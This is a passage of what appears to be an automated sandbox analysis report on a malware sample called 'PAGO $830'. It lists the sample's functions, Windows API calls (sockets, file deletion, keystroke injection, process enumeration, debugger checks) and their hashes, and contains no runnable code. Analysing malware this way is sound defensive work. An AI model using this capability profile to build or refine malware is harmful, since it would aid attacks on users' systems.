                                                          • closesocket.WSOCK32(00000000), ref: 00DF1263
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                          • String ID:
                                                          • API String ID: 540024437-0
                                                          • Opcode ID: cd337d508590627b20e33af8c063c0bbfb71ce6edeb593ca356a987e0c613495
                                                          • Instruction ID: d90c5473b6e774c21f1d603945f996a2d48eb8baa09de9fb73946f9d14da4911
                                                          • Opcode Fuzzy Hash: cd337d508590627b20e33af8c063c0bbfb71ce6edeb593ca356a987e0c613495
                                                          • Instruction Fuzzy Hash: D8419E34A00204DFD714DF64C489B2ABBE5AF46318F29C198E95A9F292C771EC85CBF1
                                                          Function 00DDD2C7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D7592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D75922,?,?,00D748AA,?,?,?,00000000), ref: 00D7594D
                                                            • Part of subcall function 00DDE0B7: GetFileAttributesW.KERNEL32(?,00DDCEB3), ref: 00DDE0B8
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00DDD33E
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DDD38E
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDD39F
                                                          • FindClose.KERNEL32(00000000), ref: 00DDD3B6
                                                          • FindClose.KERNEL32(00000000), ref: 00DDD3BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: d7f07cdc9051e6fb1c4273909a77e38002350385b143ef1526306d26654c9f10
                                                          • Instruction ID: dc71aae6b0abb92d2a64e6e9a38c563eb9f8f94b5d700cd1fc6700694760c9d6
                                                          • Opcode Fuzzy Hash: d7f07cdc9051e6fb1c4273909a77e38002350385b143ef1526306d26654c9f10
                                                          • Instruction Fuzzy Hash: AE3182310093459FC700EFA4D8558AF77E8AF95310F448A1EF8D9921A2FB61E909CB73
                                                          Function 00DAE4A0 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          • Opcode ID: b420277ba2648c3d9ab8859ab2c477aca20d99c11c245a833404ca1a4611e073
                                                          • Instruction ID: 9006b4121acd1e2b153f49aba03350694caa5b23dc0c67b1b9ecad22a10c082f
                                                          • Opcode Fuzzy Hash: b420277ba2648c3d9ab8859ab2c477aca20d99c11c245a833404ca1a4611e073
                                                          • Instruction Fuzzy Hash: 41C23772E096288FDB25CF68DD407EAB7B5EB85305F1841EAD44DE7240E774AE818F60
                                                          Function 00DE63AC Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00DE63FA
                                                          • CoInitialize.OLE32(00000000), ref: 00DE6557
                                                          • CoCreateInstance.OLE32(00E0FD14,00000000,00000001,00E0FB84,?), ref: 00DE656E
                                                          • CoUninitialize.OLE32 ref: 00DE67F2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                          • String ID: .lnk
                                                          • API String ID: 886957087-24824748
                                                          • Opcode ID: 8e59195f31f4067a95271ea3ee942a5e63740a3ab6eb2eeda58b1648435aec1b
                                                          • Instruction ID: d47de79d8710bb9ef6d3bb04ad0f8baeeb6cd4234616da5e2a3bfc479130613b
                                                          • Opcode Fuzzy Hash: 8e59195f31f4067a95271ea3ee942a5e63740a3ab6eb2eeda58b1648435aec1b
                                                          • Instruction Fuzzy Hash: 0BD15B71608341AFC314EF25C881E6BB7E8FF94744F44896DF5998B291EB70E905CBA2
                                                          Function 00DE9A49 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DE9A96
                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DE9BA9
                                                            • Part of subcall function 00DE3792: GetInputState.USER32 ref: 00DE37E9
                                                            • Part of subcall function 00DE3792: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE3884
                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DE9AC6
                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DE9B93
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                          • String ID: *.*
                                                          • API String ID: 1972594611-438819550
                                                          • Opcode ID: fba1adeece8767fce16b0bccc2735ebeaa694c2ffd81176d9ef3c7cad96006d9
                                                          • Instruction ID: 623108ac5d566c4e15ac001435c7dd58e7c9c6a9b1bcb569783f1f4522010600
                                                          • Opcode Fuzzy Hash: fba1adeece8767fce16b0bccc2735ebeaa694c2ffd81176d9ef3c7cad96006d9
                                                          • Instruction Fuzzy Hash: 37416071901249AFCF10EFA5DC99AEEBBB4EF05310F244156E809B2191E7719E84CF70
                                                          Function 00D8ADFD Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D8AECE
                                                          • GetSysColor.USER32(0000000F), ref: 00D8AFA3
                                                          • SetBkColor.GDI32(?,00000000), ref: 00D8AFB6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Color$LongProcWindow
                                                          • String ID:
                                                          • API String ID: 3131106179-0
                                                          • Opcode ID: 68370bcb8e50147edb97fcdac5798db8c813eb728f91e12c12bab21b6e189e21
                                                          • Instruction ID: 37e4403c33fd20c6952ae01439a09edf2b1443fc25581c7c9d6eb040036350fa
                                                          • Opcode Fuzzy Hash: 68370bcb8e50147edb97fcdac5798db8c813eb728f91e12c12bab21b6e189e21
                                                          • Instruction Fuzzy Hash: 1FA1E5B0205505BEF629BA2D8C88E7F269DDF83340F19050EF642D7192CA25DD86E373
                                                          Function 00DF172D Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DF2F75: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DF2FA1
                                                            • Part of subcall function 00DF2F75: _wcslen.LIBCMT ref: 00DF2FC2
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00DF1784
                                                          • WSAGetLastError.WSOCK32 ref: 00DF17AB
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00DF1802
                                                          • WSAGetLastError.WSOCK32 ref: 00DF180D
                                                          • closesocket.WSOCK32(00000000), ref: 00DF183C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 1601658205-0
                                                          • Opcode ID: f27ce79ec9463471c0bd67103a35e8802949eccf0113176773b064fa517f4808
                                                          • Instruction ID: 4b74cf8aad840305cca71ad749f450c132edbd032993524ea21096baa45ab66b
                                                          • Opcode Fuzzy Hash: f27ce79ec9463471c0bd67103a35e8802949eccf0113176773b064fa517f4808
                                                          • Instruction Fuzzy Hash: 8E51B275A00204AFDB10AF24C886F2A77E5EB48718F18C098F9199F3C3DB71AD418BB1
                                                          Function 00E01B74 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: b4c73e185c094b9b97b3f52c7499ffd4e7d8ae611f9ed9e93313318fafc8aff0
                                                          • Instruction ID: 2924e5f0bb406d6d391b5fc146500ab5ca901b97c219e7764c94a4b72c337356
                                                          • Opcode Fuzzy Hash: b4c73e185c094b9b97b3f52c7499ffd4e7d8ae611f9ed9e93313318fafc8aff0
                                                          • Instruction Fuzzy Hash: 9021E5317402108FE7248F26C894B5ABBE5EF95318F1990ACE449AF281DB72DCC1CBA0
                                                          Function 00D799D0 Relevance: 7.4, Strings: 5, Instructions: 1152COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                          • API String ID: 0-1546025612
                                                          • Opcode ID: 9de1b09c5ad5c46682d1f9e4e568b3d20023e39fd7b1d06d699d68db53881f64
                                                          • Instruction ID: 5a6df94b6437b584ce450a2ceb778a8a840282bfcab2f1cdebe8e06c6879dead
                                                          • Opcode Fuzzy Hash: 9de1b09c5ad5c46682d1f9e4e568b3d20023e39fd7b1d06d699d68db53881f64
                                                          • Instruction Fuzzy Hash: 35A25D75A0021ACBDF24CF58C9507EDB7B1BF54314F2881AAE85AA7284E774DD81CFA1
                                                          Function 00DFA5A3 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00DFA5D3
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00DFA5E1
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00DFA6C3
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFA6D2
                                                            • Part of subcall function 00D8D5DC: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00DB4062,?), ref: 00D8D606
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                          • String ID:
                                                          • API String ID: 1991900642-0
                                                          • Opcode ID: b74df25e3df35adc25d3ad19aa6dc31c4a787153a67427d70481ee356d2457b9
                                                          • Instruction ID: 981b937cdc1c04554c6a23580af88cf00aedd3eb0100c6aa266ae777ce5e0225
                                                          • Opcode Fuzzy Hash: b74df25e3df35adc25d3ad19aa6dc31c4a787153a67427d70481ee356d2457b9
                                                          • Instruction Fuzzy Hash: 09513D715083009FD710EF25C886A6BBBE8FF89754F40892DF99997252EB70D905CBB2
                                                          Function 00DDA975 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00DDA9CA
                                                          • SetKeyboardState.USER32(00000080), ref: 00DDA9E6
                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00DDAA54
                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00DDAAA6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: e4e89ff15e71d2679c39df29990c991d65578707b615fd7c04a4be83384bec2a
                                                          • Instruction ID: de03945c05109190cb0d1258bda99bc9a9f33b6eb89dc73ff0752e142af5eb61
                                                          • Opcode Fuzzy Hash: e4e89ff15e71d2679c39df29990c991d65578707b615fd7c04a4be83384bec2a
                                                          • Instruction Fuzzy Hash: 2A311630A40258AEFF308B6989057FE7BA9AB44310F18A31BE481663D1D376CE85C776
                                                          Function 00DECD62 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00DECDA7
                                                          • GetLastError.KERNEL32(?,00000000), ref: 00DECE08
                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 00DECE1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorEventFileInternetLastRead
                                                          • String ID:
                                                          • API String ID: 234945975-0
                                                          • Opcode ID: c71f69e51ad138349aee8a6f19d8e86ffeaeef8705aec6872d8cf8cd36e360a3
                                                          • Instruction ID: 9dbcafb0654d2e99b328f912100de203138f0406c04308df86270528698f7fb4
                                                          • Opcode Fuzzy Hash: c71f69e51ad138349aee8a6f19d8e86ffeaeef8705aec6872d8cf8cd36e360a3
                                                          • Instruction Fuzzy Hash: 3221B071510744AFDB30EF66C849B9BBBFCEB40714F24442AE546A2151E771EA46CBB0
                                                          Function 00DD81EE Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DD8200
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($|
                                                          • API String ID: 1659193697-1631851259
                                                          • Opcode ID: 801eab8c5657115f93aa3b433bba74c93a4d94f11ba3add0d11f7082d93bcf15
                                                          • Instruction ID: 346813230001c810a4274bf441cd3100a922565f41f4b62da6a45a6a329537ae
                                                          • Opcode Fuzzy Hash: 801eab8c5657115f93aa3b433bba74c93a4d94f11ba3add0d11f7082d93bcf15
                                                          • Instruction Fuzzy Hash: 89324774A00B059FCB29CF59C481A6AB7F0FF48710B15C56EE49ADB3A1EB70E941CB64
                                                          Function 00DE5BB5 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00DE5BDF
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00DE5C35
                                                          • FindClose.KERNEL32(?), ref: 00DE5C7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: 41563130f4d45dba58e4e02f2535e9296e88cbf4b6e0e4c091b0a10550bfeab7
                                                          • Instruction ID: 901938ee902cb833da197312c22991e3b4b2997355fdcc2a6d72845b6b2205e2
                                                          • Opcode Fuzzy Hash: 41563130f4d45dba58e4e02f2535e9296e88cbf4b6e0e4c091b0a10550bfeab7
                                                          • Instruction Fuzzy Hash: C2519B34600B019FC704EF29D490A5AB7E4FF49318F24855DE9AA8B3A2DB31E944CBA1
                                                          Function 00DA25B2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00DA26AA
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00DA26B4
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00DA26C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: fec7374676f6a9fbab85159df38c2207a975472b753c38637d1e70b2ba1250d5
                                                          • Instruction ID: 9b458efc6d851d9e9cc8f4108426302acd1cef489a6cc148de0a2f5fae31d661
                                                          • Opcode Fuzzy Hash: fec7374676f6a9fbab85159df38c2207a975472b753c38637d1e70b2ba1250d5
                                                          • Instruction Fuzzy Hash: 3231D37590221CABCB21DF69D98879CBBB8EF08310F5442DAE40CA6261EB349FC58F55
                                                          Function 00DE50EB Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00DE50F8
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DE5156
                                                          • SetErrorMode.KERNEL32(00000000), ref: 00DE51BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: 0629740f2a010fe694dfbb73cc02432c0058899f866763ce3bae57c5926259d5
                                                          • Instruction ID: 4708e27b0108b887fe7d5c1302d7f89d13f32b6cf86bc66fd8fa716a4e0deb04
                                                          • Opcode Fuzzy Hash: 0629740f2a010fe694dfbb73cc02432c0058899f866763ce3bae57c5926259d5
                                                          • Instruction Fuzzy Hash: 8F316175A00618DFDB00DF55D884FADBBB4FF48318F188099E805AB356DB72E859CBA1
